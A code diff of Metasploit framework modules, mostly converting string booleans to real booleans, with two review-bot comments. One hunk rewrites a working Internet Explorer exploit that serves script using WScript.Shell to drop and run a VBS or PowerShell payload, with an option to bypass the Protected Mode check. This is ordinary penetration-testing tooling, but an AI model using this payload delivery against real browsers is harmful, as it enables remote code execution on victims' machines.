@ -26,7 +26,7 @@ class MetasploitModule < Msf::Auxiliary
['URL', 'http://seclists.org/fulldisclosure/2016/Jan/26'],
['URL', 'https://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios']
],
'DisclosureDate' => 'Jan 09 2016',
'DisclosureDate' => 'Jan 9 2016',
'License' => MSF_LICENSE
))
@ -42,7 +42,7 @@ class MetasploitModule < Msf::Auxiliary
def run_host(ip)
ssh_opts = {
port: datastore['RPORT'],
port: rport,
auth_methods: ['fortinet-backdoor']
}

@ -39,7 +39,7 @@ class MetasploitModule < Msf::Auxiliary
[
Opt::RPORT(69),
OptString.new('FILENAME', [false, 'The file to loot', 'windows\\win.ini']),
OptBool.new('SAVE', [false, 'Save the downloaded file to disk', 'false'])
OptBool.new('SAVE', [false, 'Save the downloaded file to disk', false])
], self.class)
end

@ -52,7 +52,7 @@ class MetasploitModule < Msf::Encoder
register_options(
[
OptString.new( 'ValidCharSet', [ false, "Specify a known set of valid chars (ALPHA, ALPHANUM, FILEPATH)" ]),
OptBool.new( 'OverwriteProtect', [ false, "Indicate if the encoded payload requires protection against being overwritten" ])
OptBool.new( 'OverwriteProtect', [ false, "Indicate if the encoded payload requires protection against being overwritten", false])
],
self.class)
end
@ -179,10 +179,8 @@ class MetasploitModule < Msf::Encoder
raise EncodingError, "Unable to find AND-able chars resulting 0 in the valid character set."
end
protect_payload = (datastore['OverwriteProtect'] || "").downcase == "true"
# with everything set up, we can now call the encoding routine
state.decoder_stub = encode_payload(state.buf, reg_offset, protect_payload)
state.decoder_stub = encode_payload(state.buf, reg_offset, datastore['OverwriteProtect'])
state.buf = ""
state.decoder_stub
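Review bot: `encode_payload(state.buf, reg_offset, datastore['OverwriteProtect'])` now hands the datastore value straight through where the old code coerced it with `(... || "").downcase == "true"`; that is only equivalent if the datastore returns a real boolean for an `OptBool`, which the rest of this commit appears to assume but which I cannot confirm from this diff. If the datastore can still yield the string `"false"`, the argument is truthy and the decoder would emit the overwrite-protection stub unconditionally, changing encoded output for every caller that left the option at its default. If the normalization is guaranteed, a one-line comment at the call site would stop the next reader from re-adding the coercion: `# OptBool values are normalized to true/false by the datastore, no string compare needed`. This hunk sits inside a method that starts and ends outside the hunk.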

@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'WfsDelay' => 300, #5 minutes
'DisablePayloadHandler' => 'false',
'DisablePayloadHandler' => false,
'EXITFUNC' => 'thread'
},
'Platform' => ['php'],

@ -47,7 +47,6 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true,
'SSLVersion' => 'TLS1'
},
'Platform' => ['unix'],
'Arch' => ARCH_CMD,

@ -99,7 +99,7 @@ class MetasploitModule < Msf::Exploit::Remote
if res.body =~ /Set Default Options for #{printer_name}/
vprint_good("Added printer successfully")
delete_printer(printer_name)
elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)
elsif res.code == 401 || (res.code == 426 && datastore['SSL'])
vprint_error("Authentication failed")
elsif res.code == 426
vprint_error("SSL required - set SSL true")
@ -129,7 +129,7 @@ class MetasploitModule < Msf::Exploit::Remote
fail_with(Failure::Unreachable, "#{peer} - Could not add printer - Connection failed.")
elsif res.body =~ /Set Default Options for #{printer_name}/
print_good("Added printer successfully")
elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)
elsif res.code == 401 || (res.code == 426 && datastore['SSL'])
fail_with(Failure::NoAccess, "#{peer} - Could not add printer - Authentication failed.")
elsif res.code == 426
fail_with(Failure::BadConfig, "#{peer} - Could not add printer - SSL required - set SSL true.")
@ -145,7 +145,7 @@ class MetasploitModule < Msf::Exploit::Remote
fail_with(Failure::Unreachable, "#{peer} - Could not add test page to print queue - Connection failed.")
elsif res.body =~ /Test page sent; job ID is/
vprint_good("Added test page to printer queue")
elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)
elsif res.code == 401 || (res.code == 426 && datastore['SSL'])
fail_with(Failure::NoAccess, "#{peer} - Could not add test page to print queue - Authentication failed.")
elsif res.code == 426
fail_with(Failure::BadConfig, "#{peer} - Could not add test page to print queue - SSL required - set SSL true.")
@ -159,7 +159,7 @@ class MetasploitModule < Msf::Exploit::Remote
fail_with(Failure::Unreachable, "#{peer} - Could not delete printer - Connection failed.")
elsif res.body =~ /has been deleted successfully/
print_status("Deleted printer '#{printer_name}' successfully")
elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)
elsif res.code == 401 || (res.code == 426 && datastore['SSL'])
vprint_warning("Could not delete printer '#{printer_name}' - Authentication failed.")
elsif res.code == 426
vprint_warning("Could not delete printer '#{printer_name}' - SSL required - set SSL true.")

@ -155,7 +155,7 @@ class MetasploitModule < Msf::Exploit::Remote
end
def exploit
if check == Exploit::CheckCode::Safe && datastore['FORCE'] == false
if check == Exploit::CheckCode::Safe && !datastore['FORCE']
print_error('Target seems safe, so we will not continue.')
return
end

@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
'Name' => 'phpMyAdmin 3.5.2.2 server_sync.php Backdoor',
'Description' => %q{
This module exploits an arbitrary code execution backdoor
placed into phpMyAdmin v3.5.2.2 thorugh a compromised SourceForge mirror.
placed into phpMyAdmin v3.5.2.2 through a compromised SourceForge mirror.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,

@ -77,7 +77,7 @@ class MetasploitModule < Msf::Exploit::Remote
], self.class)
register_advanced_options(
[
OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments', '7500']),
OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments', 7500]),
], self.class)
register_autofilter_ports([ 50013 ])
end

@ -168,7 +168,7 @@ class MetasploitModule < Msf::Exploit::Remote
# msf/core/exploit/http/server.rb
#
def start_http(opts={})
# Ensture all dependencies are present before initializing HTTP
# Ensure all dependencies are present before initializing HTTP
use_zlib
comm = datastore['ListenerComm']
@ -255,7 +255,7 @@ class MetasploitModule < Msf::Exploit::Remote
# set.
#
def use_zlib
if (!Rex::Text.zlib_present? and datastore['HTTP::compression'] == true)
if !Rex::Text.zlib_present? && datastore['HTTP::compression']
fail_with(Failure::Unknown, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!")
end
end

@ -77,7 +77,7 @@ class MetasploitModule < Msf::Exploit::Remote
b = /#{wrapper}[\s\r\n]*(.*)[\s\r\n]*#{wrapper}/sm.match(res.body)
if b
return b.captures[0]
elsif datastore['HTTP::chunked'] == true
elsif datastore['HTTP::chunked']
b = /chunked Transfer-Encoding forbidden/.match(res.body)
if b
fail_with(Failure::Unknown, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005. Try disabling HTTP::chunked and trying again.')

@ -82,7 +82,7 @@ class MetasploitModule < Msf::Exploit::Remote
b = /#{wrapper}(.*)#{wrapper}/sm.match(res.body)
if b
return b.captures[0]
elsif datastore['HTTP::chunked'] == true
elsif datastore['HTTP::chunked']
b = /chunked Transfer-Encoding forbidden/.match(res.body)
if b
fail_with(Failure::BadConfig, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005. Try disabling HTTP::chunked and trying again.')

@ -110,7 +110,7 @@ print "LFI test for storable flaw is: $frozen\n";
end
def exploit
if datastore['DESTRUCTIVE'] == true
if datastore['DESTRUCTIVE']
exploit_destructive
else
exploit_nondestructive

@ -8,16 +8,26 @@ require 'msf/util/exe'
require 'msf/core/exploit/powershell'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
Rank = ManualRanking
include Msf::Exploit::Remote::BrowserExploitServer
include Msf::Exploit::EXE
include Msf::Exploit::Powershell
VULN_CHECK_JS = %Q|
try {
new ActiveXObject("WScript.Shell");
new ActiveXObject("Scripting.FileSystemObject");
is_vuln = true;
} catch(e) {}
|
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Internet Explorer Unsafe Scripting Misconfiguration',
'Description' => %q{
'Name' => 'Microsoft Internet Explorer Unsafe Scripting Misconfiguration',
'Description' => %q{
This exploit takes advantage of the "Initialize and script ActiveX controls not
marked safe for scripting" setting within Internet Explorer. When this option is set,
IE allows access to the WScript.Shell ActiveX control, which allows javascript to
@ -36,43 +46,77 @@ class MetasploitModule < Msf::Exploit::Remote
IE Tabs, WScript and subsequent Powershell prompts all run as x86 even when run from
an x64 iexplore.exe.
By default, this module will not attempt to fire against IEs that come with Protected
Mode enabled by default, because it can trigger a security prompt. However, if you are
feeling brave, you can choose to ignore this restriction by setting the ALLOWPROMPT
datastore option to true.
},
'License' => MSF_LICENSE,
'Author' =>
'License' => MSF_LICENSE,
'Author' =>
[
'natron',
'Ben Campbell' # PSH and remove ADODB.Stream
],
'References' =>
'References' =>
[
[ 'URL', 'http://support.microsoft.com/kb/182569' ],
[ 'URL', 'http://blog.invisibledenizen.org/2009/01/ieunsafescripting-metasploit-module.html' ],
[ 'URL', 'http://support.microsoft.com/kb/870669']
],
'DisclosureDate' => 'Sep 20 2010',
'Platform' => 'win',
'Targets' =>
'DisclosureDate' => 'Sep 20 2010',
'Platform' => 'win',
'BrowserRequirements' => {
source: 'script',
os_name: OperatingSystems::Match::WINDOWS,
ua_name: HttpClients::IE,
vuln_test: VULN_CHECK_JS,
vuln_test_error: 'WScript.Shell or Scripting.FileSystemObject not allowed by browser.'
},
'Arch' => ARCH_X86,
'Targets' =>
[
[ 'Windows x86/x64', { 'Arch' => ARCH_X86 } ]
[ 'Windows x86/x64', {} ]
],
'DefaultOptions' =>
'DefaultOptions' =>
{
'HTTP::compression' => 'gzip'
},
'DefaultTarget' => 0))
'DefaultTarget' => 0
))
register_options(
[
OptEnum.new('TECHNIQUE', [true, 'Delivery technique (VBS Exe Drop or PSH CMD)', 'VBS', ['VBS','Powershell']]),
OptBool.new('ALLOWPROMPT', [true, 'Allow exploit to ignore the protected mode prompt', false]),
OptEnum.new('TECHNIQUE', [true, 'Delivery technique (VBS Exe Drop or PSH CMD)', 'VBS', ['VBS','Powershell']])
], self.class
)
end
def on_request_uri(cli, request)
# Unfortunately we don't currently have an explicit way to check whether Protected Mode is
# actually enabled or not, so we can only rely on whatever is default on the OS. This should
# allow BAP2 to always fire without worrying about the prmopt popping up, but the user can
# still ignore this by setting ALLOWPROMPT to true in standalone mode.
def has_protected_mode_prompt?(browser)
if datastore['ALLOWPROMPT']
return false
elsif OperatingSystems::Match::WINDOWS_XP === browser[:os_name]
return false
end
true
end
def on_request_exploit(cli, request, browser)
if has_protected_mode_prompt?(browser)
print_warning("This target possibly has Protected Mode, exploit aborted.")
send_not_found(cli)
return
end
# Build out the HTML response page
var_shellobj = rand_text_alpha(rand(5)+5)
var_shellobj = rand_text_alpha(rand(5)+5)
p = regenerate_payload(cli)
if datastore['TECHNIQUE'] == 'VBS'
@ -92,10 +136,10 @@ class MetasploitModule < Msf::Exploit::Remote
end
def vbs_technique(var_shellobj, p)
var_fsobj = rand_text_alpha(rand(5)+5)
var_fsobj_file = rand_text_alpha(rand(5)+5)
var_vbsname = rand_text_alpha(rand(5)+5)
var_writedir = rand_text_alpha(rand(5)+5)
var_fsobj = rand_text_alpha(rand(5)+5)
var_fsobj_file = rand_text_alpha(rand(5)+5)
var_vbsname = rand_text_alpha(rand(5)+5)
var_writedir = rand_text_alpha(rand(5)+5)
exe = generate_payload_exe({ :code => p.encoded })
vbs = Msf::Util::EXE.to_exe_vbs(exe)
@ -103,7 +147,7 @@ class MetasploitModule < Msf::Exploit::Remote
# Build the javascript that will be served
js_content = %Q|
//<html><head></head><body><script>
<html><head></head><body><script>
var #{var_shellobj} = new ActiveXObject("WScript.Shell");
var #{var_fsobj} = new ActiveXObject("Scripting.FileSystemObject");
var #{var_writedir} = #{var_shellobj}.ExpandEnvironmentStrings("%TEMP%");
@ -114,20 +158,20 @@ var #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + "\\\\" + "#{
#{var_shellobj}.run("wscript.exe " + #{var_writedir} + "\\\\" + "#{var_vbsname}.vbs", 1, true);
#{var_fsobj}.DeleteFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs");
//</script></html>
</script></html>
|
return js_content
js_content
end
def psh_technique(var_shellobj, p)
cmd = Rex::Text.to_hex(cmd_psh_payload(payload.encoded, payload_instance.arch.first))
js_content = %Q|
//<html><head></head><body><script>
<html><head></head><body><script>
var #{var_shellobj} = new ActiveXObject("WScript.Shell");
#{var_shellobj}.run(unescape("#{cmd}"), 1, true);
//</script></html>
</script></html>
|
return js_content
js_content
end
end


@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'false',
'DisablePayloadHandler' => false,
'InitialAutoRunScript' => 'migrate -f'
},
'Payload' =>


@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'false',
'DisablePayloadHandler' => false,
'InitialAutoRunScript' => 'migrate -f'
},
'Payload' =>


@ -67,7 +67,7 @@ class MetasploitModule < Msf::Exploit::Remote
register_evasion_options(
[
OptBool.new('PlaylistSpaceInjection', [false, 'Add junk spaces in between each entry item in the playlist"', 'false'])
OptBool.new('PlaylistSpaceInjection', [false, 'Add junk spaces in between each entry item in the playlist"', false])
])
end
@ -119,7 +119,7 @@ class MetasploitModule < Msf::Exploit::Remote
end
def generate_space
if datastore['PlaylistSpaceInjection'] == true
if datastore['PlaylistSpaceInjection']
return rand_text(rand(100)+1, nil, " \t")
else
return ''
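Review bot: The new OptBool line still carries a stray `"` at the end of its description (`'... in the playlist"'`), so the option help text is printed with an unmatched quote; the description should read `'Add junk spaces in between each entry item in the playlist'`. In the second hunk, `generate_space`'s if/else with two explicit returns reads more idiomatically as a single expression, `datastore['PlaylistSpaceInjection'] ? rand_text(rand(100) + 1, nil, " \t") : ''`, and `rand(100) + 1` can be written `rand(1..100)`. generate_space's body ends outside the hunk.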


@ -334,7 +334,7 @@ class MetasploitModule < Msf::Exploit::Remote
msg.to = datastore['MAILTO']
msg.from = datastore['MAILFROM']
if datastore['HTML'] == true
if datastore['HTML']
body = create_email_body_html(datastore['MESSAGE'], msg.subject)
content_type = "text/html; charset=\"iso-8859-1\""
msg.add_part(body, content_type, 'quoted-printable')


@ -38,7 +38,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true',
'DisablePayloadHandler' => true,
},
'Platform' => 'win',
'Targets' =>


@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true',
'DisablePayloadHandler' => true,
},
'Payload' =>
{


@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true',
'DisablePayloadHandler' => true,
},
'Payload' =>
{


@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true',
'DisablePayloadHandler' => true,
},
'Payload' =>
{


@ -31,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true',
'DisablePayloadHandler' => true,
},
'Payload' =>
{


@ -30,7 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true',
'DisablePayloadHandler' => true,
},
'Payload' =>
{


@ -31,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true',
'DisablePayloadHandler' => true,
},
'Payload' =>
{


@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
'DisablePayloadHandler' => 'true',
'DisablePayloadHandler' => true,
},
'Payload' =>
{
